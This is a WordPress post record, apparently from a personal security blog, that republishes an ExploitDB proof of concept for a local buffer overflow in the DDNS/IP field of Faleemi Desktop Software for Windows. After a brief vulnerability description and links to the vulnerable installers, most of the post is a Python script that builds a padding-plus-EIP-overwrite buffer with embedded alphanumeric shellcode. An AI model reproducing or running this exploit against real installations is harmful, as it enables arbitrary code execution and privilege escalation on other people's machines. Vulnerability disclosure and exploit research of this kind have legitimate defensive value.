{"id":3129,"date":"2018-03-31T10:41:14","date_gmt":"2018-03-31T10:41:14","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=3129"},"modified":"2018-03-31T10:41:14","modified_gmt":"2018-03-31T10:41:14","slug":"faleemi-windows-desktop-software-ddns-ip-local-buffer-overflow","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=3129","title":{"rendered":"Faleemi Windows Desktop Software &#8211; (DDNS\/IP) Local Buffer Overflow"},"content":{"rendered":"<p><strong>Faleemi Desktop Software for Windows - (DDNS\/IP) Local Buffer Overflow<\/strong><\/p>\n<p><strong>Vuln Description:<\/strong><br \/>\nFaleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows (Beta)) are vulnerable to a buffer overflow. When overly long input is given to the DDNS\/IP parameter, it overflows the buffer and corrupts EIP, which can be used for local arbitrary code execution. If the software is running as admin and a low-privileged user has access to the application to enter a new device, that user can exploit the buffer overflow in the DDNS\/IP parameter to obtain admin privileges. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.<\/p>\n<p><strong>Vulnerable Application Info:<\/strong><br \/>\n<strong>1. Faleemi Desktop Software for Windows<\/strong><br \/>\nURL: <a href=\"http:\/\/support.faleemi.com\/fsc776\/Faleemi_v1.8.exe\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/support.faleemi.com\/fsc776\/Faleemi_v1.8.exe<\/a><\/p>\n<p>2. 
Faleemi Desktop Software for Windows (Beta)<br \/>\nURL: <a href=\"http:\/\/support.faleemi.com\/fsc776\/Faleemi_Plus_v1.0.2.exe\">http:\/\/support.faleemi.com\/fsc776\/Faleemi_Plus_v1.0.2.exe<\/a><\/p>\n<p>After hitting enter new device, click Enter device manually<\/p>\n<pre>#!\/usr\/bin\/python\n# Payload bytes written after the padding and the 4-byte value that overwrites EIP.\ncalc = (\"\\x54\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\"\n\"\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\"\n\"\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x59\\x6c\\x6b\\x58\\x6b\\x32\\x53\\x30\"\n\"\\x57\\x70\\x67\\x70\\x53\\x50\\x4e\\x69\\x39\\x75\\x54\\x71\\x39\\x50\\x61\"\n\"\\x74\\x6c\\x4b\\x66\\x30\\x44\\x70\\x6c\\x4b\\x73\\x62\\x46\\x6c\\x6e\\x6b\"\n\"\\x66\\x32\\x66\\x74\\x4e\\x6b\\x62\\x52\\x65\\x78\\x44\\x4f\\x78\\x37\\x72\"\n\"\\x6a\\x46\\x46\\x44\\x71\\x6b\\x4f\\x4c\\x6c\\x57\\x4c\\x53\\x51\\x51\\x6c\"\n\"\\x47\\x72\\x34\\x6c\\x47\\x50\\x69\\x51\\x6a\\x6f\\x64\\x4d\\x37\\x71\\x59\"\n\"\\x57\\x6d\\x32\\x5a\\x52\\x51\\x42\\x61\\x47\\x4e\\x6b\\x36\\x32\\x44\\x50\"\n\"\\x6c\\x4b\\x73\\x7a\\x55\\x6c\\x4c\\x4b\\x42\\x6c\\x52\\x31\\x63\\x48\\x6d\"\n\"\\x33\\x32\\x68\\x43\\x31\\x5a\\x71\\x53\\x61\\x6c\\x4b\\x36\\x39\\x31\\x30\"\n\"\\x73\\x31\\x4e\\x33\\x4c\\x4b\\x50\\x49\\x65\\x48\\x39\\x73\\x46\\x5a\\x37\"\n\"\\x39\\x4e\\x6b\\x64\\x74\\x4e\\x6b\\x63\\x31\\x78\\x56\\x35\\x61\\x6b\\x4f\"\n\"\\x6e\\x4c\\x39\\x51\\x7a\\x6f\\x46\\x6d\\x63\\x31\\x4b\\x77\\x50\\x38\\x6d\"\n\"\\x30\\x32\\x55\\x79\\x66\\x35\\x53\\x71\\x6d\\x78\\x78\\x57\\x4b\\x61\\x6d\"\n\"\\x35\\x74\\x70\\x75\\x69\\x74\\x30\\x58\\x4c\\x4b\\x30\\x58\\x31\\x34\\x75\"\n\"\\x51\\x69\\x43\\x70\\x66\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x6c\\x4b\\x42\\x78\"\n\"\\x75\\x4c\\x76\\x61\\x4e\\x33\\x4e\\x6b\\x57\\x74\\x4e\\x6b\\x55\\x51\\x6a\"\n\"\\x70\\x4d\\x59\\x67\\x34\\x67\\x54\\x77\\x54\\x63\\x6b\\x53\\x
6b\\x33\\x51\"\n\"\\x42\\x79\\x73\\x6a\\x33\\x61\\x69\\x6f\\x59\\x70\\x61\\x4f\\x61\\x4f\\x42\"\n\"\\x7a\\x6e\\x6b\\x34\\x52\\x58\\x6b\\x6e\\x6d\\x61\\x4d\\x62\\x4a\\x35\\x51\"\n\"\\x4c\\x4d\\x4f\\x75\\x4f\\x42\\x73\\x30\\x33\\x30\\x63\\x30\\x46\\x30\\x42\"\n\"\\x48\\x45\\x61\\x6e\\x6b\\x52\\x4f\\x4d\\x57\\x6b\\x4f\\x4a\\x75\\x4d\\x6b\"\n\"\\x4c\\x30\\x58\\x35\\x39\\x32\\x51\\x46\\x51\\x78\\x49\\x36\\x4a\\x35\\x6f\"\n\"\\x4d\\x4d\\x4d\\x59\\x6f\\x4a\\x75\\x55\\x6c\\x54\\x46\\x31\\x6c\\x65\\x5a\"\n\"\\x6d\\x50\\x59\\x6b\\x49\\x70\\x31\\x65\\x37\\x75\\x4f\\x4b\\x73\\x77\\x62\"\n\"\\x33\\x62\\x52\\x52\\x4f\\x53\\x5a\\x73\\x30\\x76\\x33\\x79\\x6f\\x68\\x55\"\n\"\\x62\\x43\\x70\\x61\\x42\\x4c\\x35\\x33\\x76\\x4e\\x53\\x55\\x30\\x78\\x43\"\n\"\\x55\\x43\\x30\\x41\\x41\")\n\nbuffer = \"A\" * 132 + \"\\x4B\\x43\\x71\\x6B\" + calc\n\nf = open('shellcode.txt', \"wb\")\nf.write(buffer)\nf.close()\n\n<\/pre>\n<p>Source: <a href=\"https:\/\/www.exploit-db.com\/exploits\/44382\/\" target=\"_blank\" rel=\"noopener noreferrer\">ExploitDB<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Faleemi Desktop Software for Windows- (DDNS\/IP) Local Buffer Overflow Vuln Description: Faleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. 
When overly long input is given to the DDNS\/IP parameter, it overflows the buffer and corrupts EIP, which can be used for local arbitrary code execution.<\/p>\n","protected":false},"author":1,"featured_media":3130,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[687,756],"tags":[754,755,757,758],"class_list":["post-3129","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploit","category-exploitdb","tag-buffer-overflow","tag-ddns-ip","tag-faleemi","tag-windows-desktop-software"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3129"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3129\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}